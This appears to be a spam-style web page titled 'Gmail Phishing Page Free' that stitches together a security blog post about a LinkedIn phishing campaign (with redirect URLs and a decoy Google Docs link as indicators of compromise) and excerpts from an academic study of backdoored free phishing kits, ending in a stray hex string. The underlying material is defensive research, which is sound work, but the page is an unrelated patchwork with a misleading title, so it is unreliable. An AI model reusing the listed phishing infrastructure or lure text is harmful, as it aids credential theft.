Behind the shortened URL redirectionURL shorteners are a well-known vehicle for spreading malware and phishing scams but they are also used for legitimate purposes, especially on social media where long URLs tend to be too cumbersome. In this attack, the perpetrators are abusing both ow.ly and a free hosting provider (gdk.mx) to redirect to the phishing page, itself hosted on a hacked website.
Gmail Phishing Page Free
This email was sent via LinkedIn and had a custom 'Security Footer'. LinkedIn will send messages "that include a security footer message with your name and professional headline to help you distinguish authentic LinkedIn emails from "phishing" email messages", although it does point it out that it is no guarantee that the email is legitimate. In other words, the delivery method is to be trusted, but the content may not. The same can be said for phishing pages that use HTTPS - which is the case here - making content delivery secure but the content itself fraudulent.
This limitation does not apply here though since the crooks are not creating (and paying for) their own accounts, but rather leveraging existing ones. Therefore, they have little to worry about burning free credits and tarnishing their victim's reputation so long as it allows them to deliver their payload far and wide.Personal security and its implicationsWe do not know how (malware, other phishing attacks, etc.) or how many LinkedIn accounts were compromised in this campaign. It's also unclear whether the shortened URLs are unique per hacked account or not, although we think they might be. The user whose account was hacked had over 500 connections on LinkedIn and based on Hootsuite's stats, we know 256 people clicked on the phishing link.
We'd like to thank @acfou for sharing a sample of this campaign with us.Indicators of compromisePhishing message:I have just shared a document with you using GoogleDoc Drive, View shared document []Redirection and phishing page:ow[.]ly/qmxf30eWLyNdgocs[.]gdk.mx/new/index.phpdgocs[.]gdk.mx/new/index.php?i=1cakrabuanacsbali[.]com/wp-rxz/index.phpDecoy Google Docs Wells Fargo file:docs.google.com/document/d/13qUEngtHuKjtvGoPaMl3x6cEnT2oO6lSWOccM-PkXKk/edit
Phishing is a form of identity theft in which an attacker attempts to elicitconfidential information from unsuspecting victims. While in the past there has been significant work on defending from phishing, much less is known about the tools and techniquesused by attackers, i.e., phishers.Of particular importance to understanding the phishers' methods and motivations arephishing kits, packages that contain complete phishing web sites in aneasy-to-deploy format.In this paper, we study in detail the kits distributed for free inunderground circles and those obtained by crawling live phishing sites.We notice that phishing kits often contain backdoors that send theentered information to third parties.We conclude that phishing kits target two classes of victims: the gullible users from whomthey extort valuable information and the unexperienced phishers whodeploy them.
The most recent step in the commoditization of phishing was the distribution offree phishing kits. These kits are actively advertised anddistributed at no charge. However, as theeconomist Milton Friedman would have pointedout [6], there is no freelunch in the underground economy. Often, free phishing kits hide backdoorsthrough which the phished information is sent to recipients (probablythe original kits' authors) other than the intended ones. In otherwords, far from being a display of generosity on behalf of the authors,free phishing kits respond to rational economical motivations. That is, kits'authors minimize the effort and risks associated with deploying thephishing site and attracting victims, and maximize their return oninvestment by harvesting the work of unwitting users.
The main contribution of this paper is the detailed analysis ofthe phishing kits distributed for free onunderground sites as well as those left on live phishing websites. We focus on thestructure of these kits and the backdooring mechanisms used by phishers.We think that this analysis is interesting under two points of view. First,it examines in detail some of the techniques employed in phishing kitsand analyzes their technical sophistication.Second, our study sheds some light on the dynamics of the phishingcommunity. It gives additional evidence of thecurrent transformation of underground circles into for-profitorganizations [29], ruled by economicalprinciples [5], in which more experiencedpractitioners resort to treachery against newcomers. This shows thatmiscreants do not only target unsuspecting regular users but also thatthey have no hesitation to attack fellow (or competing) phishers.
Theanalysis that identifies recipient email addresses is automated. Each phishing kit is uploaded to a virtualized environment,consisting of an Ubuntu system equipped with the Apache web server andthe PHP module. The kit is uncompressed inside the document root of the web server. Then, a browserinstance is directed at the index page of the kit and used to fill inthe information collected by the kit. At the end of this process, thekit sends one or more emails with the entered information.
The navigation of the phishing web site is performed using a script thatleverages the Seleniumlibrary [28] to programmatically control aninstance of the Firefox browser. The script requests a page, parses itscontent, and identifies forms and input fields. It then applies variousheuristics to fill each input field with appropriate values. This is necessary sincephishing kits often enforce type constraints on some inputs. Forexample, password values generally have a minimum length and mustcontain both letters and numbers; credit card numbers have well-definedlength and, at a minimum, must pass the Luhn test [14]. The phishingkit checks these constraints and refuses to complete its process (anddisclose its email addresses) if these constraints are not satisfied.Note that some of the tests performed are implemented also on theoriginal web site, others (e.g., the Luhn test or whether a credit cardnumber belongs to a known credit company) are inserted by the kit'sauthors. We recognize each input field's type by looking at the name field of the corresponding HTML element. The names generally indicate the intended use of the field, such as ssn (social security number), or cvv2 (card verification value).
To automate our analysis process, we need to bypass thesechecks. Therefore, we configured the system to use a DNS serverinstalled locally, which defines appropriate MX records and resolves allnames to the local address 127.0.0.1. Thus, the DNS server effectively redirects all theHTTP requests made by a phishing kit (using domain names rather than IPaddresses) to the local web server. The web server responds toall requests for non-existent resources (such as the login pageof a banking web site) with a static HTML page that contains wordstypically searched for by phishing kits to validate credentials.
From our automated analysis of the 503 phishing kits,we extracted 379 unique email addresses. They are registered at 60 different domains:gmail.com is the most frequently used (49%), followed by yahoo.com (18%) and hotmail.com (3%). Only 7 addresses arehosted at domains that do not host free mail providers. Atleast one address was clearly mistyped (the top-level domain was comr instead of .com). Among the addresses obtained from livekits, 101 were present in multiple kits.
Infrastructure.In the case of live kits, it is interesting to investigate the techniquesused to obfuscate the URL pointing to the phishing site. We use the classification proposed by Garera etal. [8]: type I URLs use an IP address in placeof the hostname; type II URLs contain a valid-looking domain nameand insert the name of the organization being phished in the path; type III URLs include the organization name in the hostname and make it follow bya long string; type IV URLs have no apparent relationship with thephished organization. It can be argued that type III URLs are likely tocorrespond to domains that were explicitly registered to host a phishing site,while type I, II, and IV URLs are more likely to correspond to vulnerablesites (for example, running web applications containing vulnerabilities)that were compromised and used to host phishing pages.
The majority of phishing kits contain all the resources required to replicate the targeted web site, including HTML pages, JavaScript and CSS files, images and other media files, such as Flashclips. This minimizes the number of requests the kit issues to thelegitimate site and, thus, the chances of being detected if the targetsite analyzes incoming requests. However, 129 kits from distributionsites and 91 from live sites contain links to the target web sites, 2kits contain the Google Analytics' tracker code (we could notconfirm whether site traffic data is sent to the legitimate site's account or aphisher's account).
PHP scripts included in the kit handle the forms used to phishinformation.These scripts collect the provided information and send it tothe phisher. As we have seen, drops are almost always transmitted using email.We conjecture that this is because, of all transmission methods, emaildoes not require any additionalinfrastructure, does not force the attacker to visit the phishingsite after the initial seeding, and is as reliable as the mail providerchosen by the phisher. Destination addresses are most often configuredby setting a variable in one of the scripts. In three kits,addresses were obtained by requesting a page on a third-party site. Inone case, the site was inaccessible. In the remaining two cases, itreturned an obfuscated email address.
A second area of work consists of the design and implementation ofmethods to prevent phishing attacks.Some of these techniques are automatic and are based, for example, onthe filtering of web pages contents [16], therestriction of informationflow [13, 25, 34], orthe obfuscation of confidential information [26].Other prevention techniques require some form of user's cooperation, inthe form, forexample, of reaction to visual cues in the browser [2, 9], or the use of external trusted devices [23].Several studies have pointed out the limitations of approaches thatrequire humanintervention [11, 27, 33]. 2ff7e9595c
Comments